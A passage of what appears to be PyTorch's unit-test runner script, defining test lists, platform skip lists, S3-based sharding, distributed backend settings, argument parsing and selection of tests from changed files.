'test_binary_ufuncs',
'test_bundled_inputs',
'test_complex',
'test_cpp_api_parity',
'test_cpp_extensions_aot_no_ninja',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_jit',
'distributed/test_c10d',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn',
'test_cuda',
'test_jit_cuda_fuser',
'test_cuda_primary_ctx',
'test_dataloader',
'test_datapipe',
'distributed/test_data_parallel',
'distributed/test_distributed_fork',
'distributed/test_distributed_spawn',
'distributions/test_constraints',
'distributions/test_distributions',
'test_dispatch',
'test_expecttest',
'test_foreach',
'test_indexing',
'test_jit',
'test_linalg',
'test_logging',
'test_mkldnn',
'test_multiprocessing',
'test_multiprocessing_spawn',
'distributed/test_nccl',
'test_native_functions',
'test_numba_integration',
'test_nn',
'test_ops',
'test_optim',
'test_pytree',
'test_mobile_optimizer',
'test_set_default_mobile_cpu_allocator',
'test_xnnpack_integration',
'test_vulkan',
'test_sparse',
'test_quantization',
'test_pruning_op',
'test_spectral_ops',
'test_serialization',
'test_shape_ops',
'test_show_pickle',
'test_sort_and_select',
'test_tensor_creation_ops',
'test_testing',
'test_torch',
'test_type_info',
'test_unary_ufuncs',
'test_utils',
'test_view_ops',
'test_vmap',
'test_namedtuple_return_api',
'test_numpy_interop',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
'test_tensorboard',
'test_namedtensor',
'test_reductions',
'test_type_promotion',
'test_jit_disabled',
'test_function_schema',
'test_op_aliases',
'test_overrides',
'test_jit_fuser_te',
'test_tensorexpr',
'test_tensorexpr_pybind',
'test_openmp',
'test_profiler',
"distributed/test_launcher",
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_futures',
'test_fx',
'test_fx_experimental',
'test_functional_autograd_benchmark',
'test_package',
'test_license',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
]
# Tests need to be run with pytest.
USE_PYTEST_LIST = [
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributions/test_constraints',
'distributions/test_transforms',
'distributions/test_utils',
'test_typing',
"distributed/elastic/events/lib_test",
]
WINDOWS_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/test_distributed_fork',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
]
ROCM_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_multiprocessing',
'test_jit_legacy',
'test_type_hints',
'test_openmp',
]
RUN_PARALLEL_BLOCKLIST = [
'test_cpp_extensions_jit',
'test_expecttest',
'test_jit_disabled',
'test_mobile_optimizer',
'test_multiprocessing',
'test_multiprocessing_spawn',
'test_namedtuple_return_api',
'test_overrides',
'test_show_pickle',
'test_tensorexpr',
'test_cuda_primary_ctx',
] + [test for test in TESTS if test.startswith('distributed/')]
WINDOWS_COVERAGE_BLOCKLIST = [
]
# These tests are slow enough that it's worth calculating whether the patch
# touched any related files first. This list was manually generated, but for every
# run with --determine-from, we use another generated list based on this one and the
# previous test stats.
TARGET_DET_LIST = [
'distributions/test_distributions',
'test_nn',
'test_autograd',
'test_cpp_extensions_jit',
'test_jit_legacy',
'test_dataloader',
'test_overrides',
'test_linalg',
'test_jit',
'test_jit_profiling',
'test_torch',
'test_binary_ufuncs'
'test_numpy_interop',
'test_reductions',
'test_shape_ops',
'test_sort_and_select',
'test_testing',
'test_view_ops',
'distributed/nn/jit/test_instantiator',
'distributed/test_distributed_fork',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/algorithms/ddp_comm_hooks/test_ddp_hooks',
'distributed/test_distributed_spawn',
'test_cuda',
'test_cuda_primary_ctx',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_aot_no_ninja',
'test_serialization',
'test_optim',
'test_utils',
'test_multiprocessing',
'test_tensorboard',
'distributed/test_c10d',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn',
'test_quantization',
'test_pruning_op',
'test_determination',
'test_futures',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
]
# the JSON file to store the S3 test stats
TEST_TIMES_FILE = '.pytorch-test-times'
# if a test file takes longer than 5 min, we add it to TARGET_DET_LIST
SLOW_TEST_THRESHOLD = 300
_DEP_MODULES_CACHE: Dict[str, set] = {}
DISTRIBUTED_TESTS_CONFIG = {}
if dist.is_available():
DISTRIBUTED_TESTS_CONFIG['test'] = {
'WORLD_SIZE': '1'
}
if not TEST_WITH_ROCM and dist.is_mpi_available():
DISTRIBUTED_TESTS_CONFIG['mpi'] = {
'WORLD_SIZE': '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-mpi'
}
if dist.is_nccl_available():
DISTRIBUTED_TESTS_CONFIG['nccl'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-nccl'
}
if dist.is_gloo_available():
DISTRIBUTED_TESTS_CONFIG['gloo'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-gloo'
}
# https://stackoverflow.com/questions/2549939/get-signal-names-from-numbers-in-python
SIGNALS_TO_NAMES_DICT = {getattr(signal, n): n for n in dir(signal)
if n.startswith('SIG') and '_' not in n}
CPP_EXTENSIONS_ERROR = """
Ninja (https://ninja-build.org) is required for some of the C++ extensions
tests, but it could not be found. Install ninja with `pip install ninja`
or `conda install ninja`. Alternatively, disable said tests with
`run_test.py --exclude test_cpp_extensions_aot_ninja test_cpp_extensions_jit`.
"""
PYTORCH_COLLECT_COVERAGE = bool(os.environ.get("PYTORCH_COLLECT_COVERAGE"))
JIT_EXECUTOR_TESTS = [
'test_jit_cuda_fuser',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
]
def print_to_stderr(message):
print(message, file=sys.stderr)
# Convert something like pytorch_windows_vs2019_py36_cuda10.1_build to pytorch_windows_vs2019_py36_cuda10.1
def get_stripped_CI_job() -> str:
job = os.environ.get("CIRCLE_JOB", "").rstrip('0123456789')
if job.endswith('_slow_test'):
job = job[:len(job) - len('_slow_test')]
elif job.endswith('_test'):
job = job[:len(job) - len('_test')]
elif job.endswith('_build'):
job = job[:len(job) - len('_build')]
return job
def calculate_job_times(reports: List["Report"]) -> Dict[str, float]:
# an entry will be like ("test_file_name" -> (current_avg, # values))
jobs_to_times: Dict[str, Tuple[float, int]] = dict()
for report in reports:
assert report.get('format_version') == 2, "S3 format currently handled is version 2 only"
files: Dict[str, Any] = report['files']
for name, test_file in files.items():
if name not in jobs_to_times:
jobs_to_times[name] = (test_file['total_seconds'], 1)
else:
curr_avg, curr_count = jobs_to_times[name]
new_count = curr_count + 1
new_avg = (curr_avg * curr_count + test_file['total_seconds']) / new_count
jobs_to_times[name] = (new_avg, new_count)
# if there's 'test_cpp_extensions_aot' entry in jobs_to_times, add 'test_cpp_extensions_aot_ninja'
# and 'test_cpp_extensions_aot_no_ninja' duplicate entries to ease future computation since
# test_cpp_extensions_aot_no_ninja and test_cpp_extensions_aot_ninja are Python test jobs that
# both use the test_cpp_extensions_aot.py file.
if 'test_cpp_extensions_aot' in jobs_to_times:
jobs_to_times['test_cpp_extensions_aot_ninja'] = jobs_to_times['test_cpp_extensions_aot']
jobs_to_times['test_cpp_extensions_aot_no_ninja'] = jobs_to_times['test_cpp_extensions_aot']
return {job: time for job, (time, _) in jobs_to_times.items()}
def pull_job_times_from_S3() -> Dict[str, float]:
if HAVE_BOTO3:
ci_job_prefix = get_stripped_CI_job()
s3_reports: List["Report"] = get_previous_reports_for_branch('origin/nightly', ci_job_prefix)
else:
print('Uh oh, boto3 is not found. Either it is not installed or we failed to import s3_stat_parser.')
print('If not installed, please install boto3 for automatic sharding and test categorization.')
s3_reports = []
if len(s3_reports) == 0:
print('Gathered no reports from S3. Please proceed without them.')
return dict()
return calculate_job_times(s3_reports)
def get_past_job_times() -> Dict[str, float]:
if os.path.exists(TEST_TIMES_FILE):
with open(TEST_TIMES_FILE) as file:
test_times_json: JobTimeJSON = json.load(file)
curr_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip()
file_commit = test_times_json.get('commit', '')
curr_ci_job = get_stripped_CI_job()
file_ci_job = test_times_json.get('CIRCLE_JOB', 'N/A')
if curr_commit != file_commit:
print(f'Current test times file is from different commit {file_commit}.')
elif curr_ci_job != file_ci_job:
print(f'Current test times file is for different CI job {file_ci_job}.')
else:
print(f'Found stats for current commit: {curr_commit} and job: {curr_ci_job}. Proceeding with those values.')
return test_times_json.get('job_times', {})
# Found file, but commit or CI job in JSON doesn't match
print(f'Overwriting current file with stats based on current commit: {curr_commit} and CI job: {curr_ci_job}')
job_times = pull_job_times_from_S3()
print(f'Exporting S3 test stats to {TEST_TIMES_FILE}.')
export_S3_test_times(TEST_TIMES_FILE, job_times)
return job_times
class JobTimeJSON(TypedDict):
commit: str
job_times: Dict[str, float]
def get_job_times_json(job_times: Dict[str, float]) -> JobTimeJSON:
return {
'commit': subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip(),
'CIRCLE_JOB': get_stripped_CI_job(),
'job_times': job_times,
}
def get_shard(which_shard: int, num_shards: int, tests: List[str]) -> List[str]:
jobs_to_times = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. Proceeding with default sharding plan.')
return tests[which_shard - 1 :: num_shards]
shards = calculate_shards(num_shards, tests, jobs_to_times)
_, tests_from_shard = shards[which_shard - 1]
return tests_from_shard
def get_slow_tests_based_on_S3() -> List[str]:
jobs_to_times: Dict[str, float] = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. No new slow tests calculated.')
return []
slow_tests: List[str] = []
for test in TESTS:
if test in jobs_to_times and test not in TARGET_DET_LIST:
if jobs_to_times[test] > SLOW_TEST_THRESHOLD:
slow_tests.append(test)
return slow_tests
def get_executable_command(options, allow_pytest, disable_coverage=False):
if options.coverage and not disable_coverage:
executable = ['coverage', 'run', '--parallel-mode', '--source=torch']
else:
executable = [sys.executable]
if options.pytest:
if allow_pytest:
executable += ['-m', 'pytest']
else:
print_to_stderr('Pytest cannot be used for this test. Falling back to unittest.')
return executable
def run_test(test_module, test_directory, options, launcher_cmd=None, extra_unittest_args=None):
unittest_args = options.additional_unittest_args.copy()
if options.verbose:
unittest_args.append(f'-{"v"*options.verbose}') # in case of pytest
if test_module in RUN_PARALLEL_BLOCKLIST:
unittest_args = [arg for arg in unittest_args if not arg.startswith('--run-parallel')]
if extra_unittest_args:
assert isinstance(extra_unittest_args, list)
unittest_args.extend(extra_unittest_args)
# If using pytest, replace -f with equivalent -x
if options.pytest:
unittest_args = [arg if arg != '-f' else '-x' for arg in unittest_args]
# Can't call `python -m unittest test_*` here because it doesn't run code
# in `if __name__ == '__main__': `. So call `python test_*.py` instead.
argv = [test_module + '.py'] + unittest_args
# Multiprocessing related tests cannot run with coverage.
# Tracking issue: https://github.com/pytorch/pytorch/issues/50661
disable_coverage = sys.platform == 'win32' and test_module in WINDOWS_COVERAGE_BLOCKLIST
# Extra arguments are not supported with pytest
executable = get_executable_command(options, allow_pytest=not extra_unittest_args,
disable_coverage=disable_coverage)
command = (launcher_cmd or []) + executable + argv
print_to_stderr('Executing {} ... [{}]'.format(command, datetime.now()))
return shell(command, test_directory)
def test_cuda_primary_ctx(test_module, test_directory, options):
return run_test(test_module, test_directory, options, extra_unittest_args=['--subprocess'])
def _test_cpp_extensions_aot(test_module, test_directory, options, use_ninja):
if use_ninja:
try:
cpp_extension.verify_ninja_availability()
except RuntimeError:
print(CPP_EXTENSIONS_ERROR)
return 1
# Wipe the build folder, if it exists already
cpp_extensions_test_dir = os.path.join(test_directory, 'cpp_extensions')
cpp_extensions_test_build_dir = os.path.join(cpp_extensions_test_dir, 'build')
if os.path.exists(cpp_extensions_test_build_dir):
shutil.rmtree(cpp_extensions_test_build_dir)
# Build the test cpp extensions modules
shell_env = os.environ.copy()
shell_env['USE_NINJA'] = str(1 if use_ninja else 0)
cmd = [sys.executable, 'setup.py', 'install', '--root', './install']
return_code = shell(cmd, cwd=cpp_extensions_test_dir, env=shell_env)
if return_code != 0:
return return_code
if sys.platform != 'win32':
return_code = shell(cmd,
cwd=os.path.join(cpp_extensions_test_dir, 'no_python_abi_suffix_test'),
env=shell_env)
if return_code != 0:
return return_code
# "install" the test modules and run tests
python_path = os.environ.get('PYTHONPATH', '')
try:
cpp_extensions = os.path.join(test_directory, 'cpp_extensions')
install_directory = ''
# install directory is the one that is named site-packages
for root, directories, _ in os.walk(os.path.join(cpp_extensions, 'install')):
for directory in directories:
if '-packages' in directory:
install_directory = os.path.join(root, directory)
assert install_directory, 'install_directory must not be empty'
os.environ['PYTHONPATH'] = os.pathsep.join([install_directory, python_path])
return run_test(test_module, test_directory, options)
finally:
os.environ['PYTHONPATH'] = python_path
def test_cpp_extensions_aot_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot', test_directory,
options, use_ninja=True)
def test_cpp_extensions_aot_no_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot',
test_directory, options, use_ninja=False)
def test_distributed(test_module, test_directory, options):
mpi_available = subprocess.call('command -v mpiexec', shell=True) == 0
if options.verbose and not mpi_available:
print_to_stderr(
'MPI not available -- MPI backend tests will be skipped')
config = DISTRIBUTED_TESTS_CONFIG
for backend, env_vars in config.items():
if sys.platform == 'win32' and backend != 'gloo':
continue
if backend == 'mpi' and not mpi_available:
continue
for with_init_file in {True, False}:
if sys.platform == 'win32' and not with_init_file:
continue
tmp_dir = tempfile.mkdtemp()
if options.verbose:
init_str = "with {} init_method"
with_init = init_str.format("file" if with_init_file else "env")
print_to_stderr(
'Running distributed tests for the {} backend {}'.format(
backend, with_init))
os.environ['TEMP_DIR'] = tmp_dir
os.environ['BACKEND'] = backend
os.environ['INIT_METHOD'] = 'env://'
os.environ.update(env_vars)
if with_init_file:
if test_module in ["test_distributed_fork", "test_distributed_spawn"]:
init_method = f'{FILE_SCHEMA}{tmp_dir}/'
else:
init_method = f'{FILE_SCHEMA}{tmp_dir}/shared_init_file'
os.environ['INIT_METHOD'] = init_method
try:
os.mkdir(os.path.join(tmp_dir, 'barrier'))
os.mkdir(os.path.join(tmp_dir, 'test_dir'))
if backend == 'mpi':
# test mpiexec for --noprefix option
with open(os.devnull, 'w') as devnull:
allowrunasroot_opt = '--allow-run-as-root' if subprocess.call(
'mpiexec --allow-run-as-root -n 1 bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
noprefix_opt = '--noprefix' if subprocess.call(
f'mpiexec {allowrunasroot_opt} -n 1 --noprefix bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
mpiexec = ['mpiexec', '-n', '3', noprefix_opt, allowrunasroot_opt]
return_code = run_test(test_module, test_directory, options,
launcher_cmd=mpiexec)
else:
return_code = run_test(test_module, test_directory, options)
if return_code != 0:
return return_code
finally:
shutil.rmtree(tmp_dir)
return 0
CUSTOM_HANDLERS = {
'test_cuda_primary_ctx': test_cuda_primary_ctx,
'test_cpp_extensions_aot_no_ninja': test_cpp_extensions_aot_no_ninja,
'test_cpp_extensions_aot_ninja': test_cpp_extensions_aot_ninja,
'distributed/test_distributed_fork': test_distributed,
'distributed/test_distributed_spawn': test_distributed,
}
def parse_test_module(test):
return test.split('.')[0]
class TestChoices(list):
def __init__(self, *args, **kwargs):
super(TestChoices, self).__init__(args[0])
def __contains__(self, item):
return list.__contains__(self, parse_test_module(item))
def parse_args():
parser = argparse.ArgumentParser(
description='Run the PyTorch unit test suite',
epilog='where TESTS is any of: {}'.format(', '.join(TESTS)))
parser.add_argument(
'-v',
'--verbose',
action='count',
default=0,
help='print verbose information and test-by-test results')
parser.add_argument(
'--jit',
'--jit',
action='store_true',
help='run all jit tests')
parser.add_argument(
'-pt', '--pytest', action='store_true',
help='If true, use `pytest` to execute the tests. E.g., this runs '
'TestTorch with pytest in verbose and coverage mode: '
'python run_test.py -vci torch -pt')
parser.add_argument(
'-c', '--coverage', action='store_true', help='enable coverage',
default=PYTORCH_COLLECT_COVERAGE)
parser.add_argument(
'-i',
'--include',
nargs='+',
choices=TestChoices(TESTS),
default=TESTS,
metavar='TESTS',
help='select a set of tests to include (defaults to ALL tests).'
' tests can be specified with module name, module.TestClass'
' or module.TestClass.test_method')
parser.add_argument(
'-x',
'--exclude',
nargs='+',
choices=TESTS,
metavar='TESTS',
default=[],
help='select a set of tests to exclude')
parser.add_argument(
'-f',
'--first',
choices=TESTS,
metavar='TESTS',
help='select the test to start from (excludes previous tests)')
parser.add_argument(
'-l',
'--last',
choices=TESTS,
metavar='TESTS',
help='select the last test to run (excludes following tests)')
parser.add_argument(
'--bring-to-front',
nargs='+',
choices=TestChoices(TESTS),
default=[],
metavar='TESTS',
help='select a set of tests to run first. This can be used in situations'
' where you want to run all tests, but care more about some set, '
'e.g. after making a change to a specific component')
parser.add_argument(
'--ignore-win-blocklist',
action='store_true',
help='always run blocklisted windows tests')
parser.add_argument(
'--determine-from',
help='File of affected source filenames to determine which tests to run.')
parser.add_argument(
'--continue-through-error',
action='store_true',
help='Runs the full test suite despite one of the tests failing')
parser.add_argument(
'additional_unittest_args',
nargs='*',
help='additional arguments passed through to unittest, e.g., '
'python run_test.py -i sparse -- TestSparse.test_factory_size_check')
parser.add_argument(
'--export-past-test-times',
nargs='?',
type=str,
const=TEST_TIMES_FILE,
help='dumps test times from previous S3 stats into a file, format JSON',
)
parser.add_argument(
'--shard',
nargs=2,
type=int,
help='runs a shard of the tests (taking into account other selections), e.g., '
'--shard 2 3 will break up the selected tests into 3 shards and run the tests '
'in the 2nd shard (the first number should not exceed the second)',
)
parser.add_argument(
'--exclude-jit-executor',
action='store_true',
help='exclude tests that are run for a specific jit config'
)
return parser.parse_args()
def find_test_index(test, selected_tests, find_last_index=False):
"""Find the index of the first or last occurrence of a given test/test module in the list of selected tests.
This function is used to determine the indices when slicing the list of selected tests when
``options.first``(:attr:`find_last_index`=False) and/or ``options.last``(:attr:`find_last_index`=True) are used.
:attr:`selected_tests` can be a list that contains multiple consequent occurrences of tests
as part of the same test module, e.g.:
```
selected_tests = ['autograd', 'cuda', **'torch.TestTorch.test_acos',
'torch.TestTorch.test_tan', 'torch.TestTorch.test_add'**, 'utils']
```
If :attr:`test`='torch' and :attr:`find_last_index`=False, result should be **2**.
If :attr:`test`='torch' and :attr:`find_last_index`=True, result should be **4**.
Args:
test (str): Name of test to lookup
selected_tests (list): List of tests
find_last_index (bool, optional): should we lookup the index of first or last
occurrence (first is default)
Returns:
index of the first or last occurrence of the given test
"""
idx = 0
found_idx = -1
for t in selected_tests:
if t.startswith(test):
found_idx = idx
if not find_last_index:
break
idx += 1
return found_idx
def exclude_tests(exclude_list, selected_tests, exclude_message=None):
for exclude_test in exclude_list:
tests_copy = selected_tests[:]
for test in tests_copy:
if test.startswith(exclude_test):
if exclude_message is not None:
print_to_stderr('Excluding {} {}'.format(test, exclude_message))
selected_tests.remove(test)
return selected_tests
def get_selected_tests(options):
selected_tests = options.include
if options.bring_to_front:
to_front = set(options.bring_to_front)
selected_tests = options.bring_to_front + list(filter(lambda name: name not in to_front,
selected_tests))
if options.first:
first_index = find_test_index(options.first, selected_tests)
selected_tests = selected_tests[first_index:]
if options.last:
last_index = find_test_index(options.last, selected_tests, find_last_index=True)
selected_tests = selected_tests[:last_index + 1]
if options.shard:
assert len(options.shard) == 2, "Unexpected shard format"
assert min(options.shard) > 0, "Shards must be positive numbers"
which_shard, num_shards = options.shard
assert which_shard <= num_shards, "Selected shard must be less or equal that total number of shards"
assert num_shards <= len(selected_tests), f"Number of shards must be less than {len(selected_tests)}"
selected_tests = get_shard(which_shard, num_shards, selected_tests)
if options.exclude_jit_executor:
options.exclude.extend(JIT_EXECUTOR_TESTS)
selected_tests = exclude_tests(options.exclude, selected_tests)
if sys.platform == 'win32' and not options.ignore_win_blocklist:
target_arch = os.environ.get('VSCMD_ARG_TGT_ARCH')
if target_arch != 'x64':
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_no_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_jit')
WINDOWS_BLOCKLIST.append('jit')
WINDOWS_BLOCKLIST.append('jit_fuser')
selected_tests = exclude_tests(WINDOWS_BLOCKLIST, selected_tests, 'on Windows')
elif TEST_WITH_ROCM:
selected_tests = exclude_tests(ROCM_BLOCKLIST, selected_tests, 'on ROCm')
return selected_tests
def test_impact_of_file(filename):
"""Determine what class of impact this file has on test runs.
Possible values:
TORCH - torch python code
CAFFE2 - caffe2 python code
TEST - torch test code
UNKNOWN - may affect all tests
NONE - known to have no effect on test outcome
CI - CI configuration files
"""
parts = filename.split(os.sep)
if parts[0] in ['.jenkins', '.circleci']:
return 'CI'
if parts[0] in ['docs', 'scripts', 'CODEOWNERS', 'README.md']:
return 'NONE'
elif parts[0] == 'torch':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TORCH'
elif parts[0] == 'caffe2':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'CAFFE2'
elif parts[0] == 'test':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TEST'
return 'UNKNOWN'
def log_test_reason(file_type, filename, test, options):
if options.verbose:
print_to_stderr(
'Determination found {} file {} -- running {}'.format(
file_type,
filename,
test,
)
)
def get_dep_modules(test):
# Cache results in case of repetition
if test in _DEP_MODULES_CACHE:
return _DEP_MODULES_CACHE[test]
repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_location = os.path.join(repo_root, 'test', test + '.py')
finder = modulefinder.ModuleFinder(
# Ideally exclude all third party modules, to speed up calculation.
excludes=[
'scipy',
'numpy',
'numba',
'multiprocessing',
'sklearn',
'setuptools',
'hypothesis',
'llvmlite',
'joblib',
'email',
'importlib',
'unittest',
'urllib',
'json',
'collections',
# Modules below are excluded because they are hitting https://bugs.python.org/issue40350
# Trigger AttributeError: 'NoneType' object has no attribute 'is_package'
'mpl_toolkits',
'google',
'onnx',
# Triggers RecursionError
'mypy'
],
)
# HACK: some platforms default to ascii, so we can't just run_script :(
with open(test_location, 'r', encoding='utf-8') as fp:
finder.load_module('__main__', fp, test_location, ('', 'r', 1))
dep_modules = set(finder.modules.keys())
_DEP_MODULES_CACHE[test] = dep_modules
return dep_modules
def determine_target(target_det_list, test, touched_files, options):
test = parse_test_module(test)
# Some tests are faster to execute than to determine.
if test not in target_det_list:
if options.verbose:
print_to_stderr(f'Running {test} without determination')
return True
# HACK: "no_ninja" is not a real module
if test.endswith('_no_ninja'):
test = test[:(-1 * len('_no_ninja'))]
if test.endswith('_ninja'):
test = test[:(-1 * len('_ninja'))]
dep_modules = get_dep_modules(test)
for touched_file in touched_files:
file_type = test_impact_of_file(touched_file)
if file_type == 'NONE':
continue
elif file_type == 'CI':
# Force all tests to run if any change is made to the CI
# configurations.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type == 'UNKNOWN':
# Assume uncategorized source files can affect every test.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type in ['TORCH', 'CAFFE2', 'TEST']:
parts = os.path.splitext(touched_file)[0].split(os.sep)
touched_module = ".".join(parts)
# test/ path does not have a "test." namespace
if touched_module.startswith('test.'):
touched_module = touched_module.split('test.')[1]
if (
touched_module in dep_modules
or touched_module == test.replace('/', '.')
):
log_test_reason(file_type, touched_file, test, options)
return True
# If nothing has determined the test has run, don't run the test.
if options.verbose:
print_to_stderr(f'Determination is skipping {test}')
return False
def run_test_module(test: str, test_directory: str, options) -> Optional[str]:
test_module = parse_test_module(test)
# Printing the date here can help diagnose which tests are slow
print_to_stderr('Running {} ... [{}]'.format(test, datetime.now()))
handler = CUSTOM_HANDLERS.get(test_module, run_test)
return_code = handler(test_module, test_directory, options)
assert isinstance(return_code, int) and not isinstance(
return_code, bool), 'Return code should be an integer'
if return_code == 0:
return None
message = f'{test} failed!'
if return_code < 0:
# subprocess.Popen returns the child process' exit signal as
# return code -N, where N is the signal number.
signal_name = SIGNALS_TO_NAMES_DICT[-return_code]
message += f' Received signal: {signal_name}'
return message
def export_S3_test_times(test_times_filename: str, test_times: Dict[str, float]) -> None:
if os.path.exists(test_times_filename):
print(f'Overwriting existent file: {test_times_filename}')
with open(test_times_filename, 'w+') as file:
job_times_json = get_job_times_json(test_times)
json.dump(job_times_json, file, indent=' ', separators=(',', ': '))
file.write('\n')
def main():
options = parse_args()
test_times_filename = options.export_past_test_times
if test_times_filename:
print(f'Exporting past test times from S3 to {test_times_filename}, no tests will be run.')
export_S3_test_times(test_times_filename, pull_job_times_from_S3())
return
test_directory = os.path.dirname(os.path.abspath(__file__))
selected_tests = get_selected_tests(options)
if options.verbose:
print_to_stderr('Selected tests: {}'.format(', '.join(selected_tests)))
if options.coverage and not PYTORCH_COLLECT_COVERAGE:
shell(['coverage', 'erase'])
if options.jit:
selected_tests = filter(lambda test_name: "jit" in test_name, TESTS)
if options.determine_from is not None and os.path.exists(options.determine_from):
slow_tests = get_slow_tests_based_on_S3()
print('Added the following tests to target_det tests as calculated based on S3:')
